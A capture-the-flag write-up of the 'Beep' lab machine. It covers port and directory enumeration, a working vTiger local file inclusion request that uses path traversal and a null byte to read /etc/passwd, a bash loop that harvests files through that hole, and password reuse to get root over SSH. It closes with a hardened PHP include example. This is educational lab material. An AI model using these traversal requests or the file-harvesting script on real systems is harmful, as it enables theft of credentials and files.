Beep

Enumeration

Let's start out by enumerating the box and finding out what we are dealing with.
```text
# Nmap 7.92 scan initiated Mon Jan  3 16:51:21 2022 as: nmap -sC -sV -oA nmap/scan -v 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.021s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: UIDL AUTH-RESP-CODE TOP USER IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES LOGIN-DELAY(0) APOP STLS EXPIRE(NEVER) PIPELINING
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed STARTTLS OK ATOMIC URLAUTHA0001 LITERAL+ MAILBOX-REFERRALS THREAD=REFERENCES RENAME LIST-SUBSCRIBED SORT LISTEXT MULTIAPPEND ID NO X-NETSCAPE THREAD=ORDEREDSUBJECT ANNOTATEMORE UIDPLUS UNSELECT CHILDREN IMAP4rev1 CATENATE SORT=MODSEQ IDLE RIGHTS=kxte BINARY ACL IMAP4 NAMESPACE QUOTA CONDSTORE
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2022-01-03T06:55:55+00:00; +1h01m05s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Elastix - Login page
| http-robots.txt: 1 disallowed entry 
|_/
|_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1h01m04s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan  3 16:57:54 2022 -- 1 IP address (1 host up) scanned in 393.30 seconds
```
Looks like there are quite a few ports open. Starting with http on port 80, we get redirected to https on port 443 and are presented with a login screen. Default credentials like admin:admin and admin:password don't work, so instead I move on to a gobuster scan to try and increase the attack surface.

```bash
gobuster dir -t 100 -u https://10.10.10.7 -x php -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words.txt -k -o gobuster
```
Gobuster produced the following output:

```bash
┌──(tom㉿acer-computer)-[~/htb/beep]
└─$ cat 10.10.10.7-gobuster 
/.html                (Status: 403) [Size: 283]
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/.htm                 (Status: 403) [Size: 282]
/.html.php            (Status: 403) [Size: 287]
/.htm.php             (Status: 403) [Size: 286]
/index.php            (Status: 200) [Size: 1785]
/config.php           (Status: 200) [Size: 1785]
/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/libs                 (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/.                    (Status: 200) [Size: 1785]
/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/.htaccess            (Status: 403) [Size: 287]
/register.php         (Status: 200) [Size: 1785]
/.htaccess.php        (Status: 403) [Size: 291]
/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/configs              (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/.htc                 (Status: 403) [Size: 282]
/.htc.php             (Status: 403) [Size: 286]
/.html_var_DE         (Status: 403) [Size: 290]
/.html_var_DE.php     (Status: 403) [Size: 294]
/.htpasswd            (Status: 403) [Size: 287]
/.htpasswd.php        (Status: 403) [Size: 291]
/.html..php           (Status: 403) [Size: 288]
/.html.               (Status: 403) [Size: 284]
/.html.html.php       (Status: 403) [Size: 292]
/.html.html           (Status: 403) [Size: 288]
/recordings           (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/.htpasswds           (Status: 403) [Size: 288]
/.htpasswds.php       (Status: 403) [Size: 292]
/.htm.                (Status: 403) [Size: 283]
/.htm..php            (Status: 403) [Size: 287]
/vtigercrm            (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
<SNIP..>
```
Gobuster identifies an `/admin` directory, and navigating to it I get presented with an authentication prompt. Default credentials again do not work; I might try brute forcing later if I don't have success anywhere else. Hitting cancel directs us to `/admin/config.php` and says that we are unauthorised, which makes me think we have some information disclosure on this page.
Clicking on the recordings tab takes us to yet another page.
This page says we are using FreePBX version 2.5, which is different from the last page, which said we were using v2.8.1.4. Using gobuster on this page shows that a `/modules` directory exists, and navigating to it shows several files containing php code.
Going back to the nmap scan, I notice another http service listening on port 10000. Navigating to this page we are presented with yet another login page. After attempting to log in with default credentials, I get an error message saying that my IP has been blocked due to too many authentication failures.

Exploitation

With a lot of things to enumerate, I start by googling around for exploits for FreePBX 2.8.1.4, as I don't have a version number for the Elastix install running on port 443. I find a Metasploit module, but running it against the server does not result in a shell; Metasploit reports that the exploit completed but no shell was created. So back to enumeration.

More enumeration

After reviewing the gobuster scan, the `/vtigercrm` result piques my interest. Navigating to this page shows yet another login page.
I notice the software name and version number in the bottom left and throw that into Google. I find this exploit on Exploit-DB, which is a local file inclusion exploit, and it works!!

```bash
┌──(tom㉿acer-computer)-[~/htb/beep]
└─$ curl "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00" -k
root:x:0:0:root:/root:/bin/bash
<SNIP...>
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
<SNIP..>
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
<SNIP...>
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
<SNIP..>
spamfilter:x:500:500::/home/spamfilter:/bin/bash
<SNIP..>
fanis:x:501:501::/home/fanis:/bin/bash
```
From this we can identify the users spamfilter and fanis.

Exploitation again

I attempted to use php filters to leak the website source code, however I was unsuccessful. The only thing I was able to get was the user flag by requesting `sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00`, however I feel this is sort of cheating as I am not actually the user yet. I create the following bash script in order to retrieve useful files from the server.
```bash
#!/bin/bash
# Read the LFI wordlist line by line (avoids word splitting on the output of cat)
while IFS= read -r i
do
        contents=$(curl -s -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..${i}%00")

        # Only save non-empty responses (the original "wc -c != 0" test never failed, because echo always emits a newline)
        if [ -n "$contents" ]
        then
                printf '%s\n' "$contents" > "$(echo "$i" | tr '/' '_').txt"
        fi
done < /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
```
The config files for the website must be stored in a non-standard location, as I did not get any config files. At this point I refer to another walkthrough for a hint on where to go next.
Hint - Elastix exploit: `/help`
Looking at the searchsploit results, both the LFI and RCE exploits look interesting. I start with the LFI as I had success with that before. The LFI example brings up a config page with users and passwords in it. I now have credentials for the asterisk user and admin. The password works and gets me into the admin portal.
I try to ssh into the machine as the asterisk user, with no success. I try as root and am successful, allowing me to grab the root flag.

Review / Take aways

After doing some research on the box, it turns out there are multiple ways of exploiting it. It's useful to always look for help documents on the machine, as they can tell you version numbers or dates. The reason the php filters did not work was due to the position of the variable within the include path in the backend, e.g.

```php
@include("include/language/$language.lang.php");
```

Even though `language` was never sanitised, because it comes after `include/language/`, adding a php filter would make the path look like `include/language/php://......` and would not show anything. If instead of `include` it was `file_get_contents`, it would get the contents of the file and not execute any code.
When I get stuck, I should always go back a step in my enumeration process and see if there was a result I missed or a result I was going to review but forgot.
I should have also checked the server for any ssh keys as that could have been an easy win.
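To make the take-away concrete, here is an added example (not code from this writeup, Elastix or vTiger) that puts the vulnerable include shape next to a hardened version. The function names, the allowlist of language codes and the temp-directory demo are all assumptions made for illustration.

```php
<?php
// Vulnerable shape quoted in the writeup: the user value sits in the middle of
// the path. The "include/language/" prefix defeats a php://filter wrapper, but
// "../" traversal still escapes the directory and, on PHP before 5.3.4, a %00
// null byte truncates the ".lang.php" suffix so any readable file is included.
function load_language_unsafe(string $language): void
{
    @include("include/language/$language.lang.php"); // vulnerable, as on the page
}

// Hardened form: the value must be a known language code, and the resolved
// path must still sit inside the language directory. Returns the safe path
// or null when the input is rejected.
function resolve_language_file(string $language, array $allowed, string $baseDir): ?string
{
    if (!in_array($language, $allowed, true)) {   // strict allowlist, the real fix
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $language . '.lang.php');
    if ($base === false || $file === false) {     // realpath() needs the file to exist
        return null;
    }
    // Containment check: the real file path must start with the real base dir.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

function load_language_safe(string $language, string $baseDir): void
{
    $file = resolve_language_file($language, ['en_us', 'de_de'], $baseDir)
         ?? resolve_language_file('en_us', ['en_us', 'de_de'], $baseDir); // fall back to default
    if ($file !== null) {
        include $file;
    }
}

// Demo on a constructed temp directory holding one legitimate language file.
$dir = sys_get_temp_dir() . '/lang_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/en_us.lang.php", "<?php \$strings = ['hello' => 'Hello'];\n");
// Inputs: one legitimate code, then the traversal, null-byte and wrapper shapes from the writeup.
foreach (['en_us', '../../../../etc/passwd', "en_us\0", 'php://filter/resource=x'] as $v) {
    $r = resolve_language_file($v, ['en_us', 'de_de'], $dir);
    echo json_encode($v), ' => ', $r === null ? 'rejected' : 'ok', PHP_EOL;
}
```

Only the allowlisted `en_us` resolves; the traversal, null-byte and wrapper inputs are rejected before any path is built, which is the property the original include lacked.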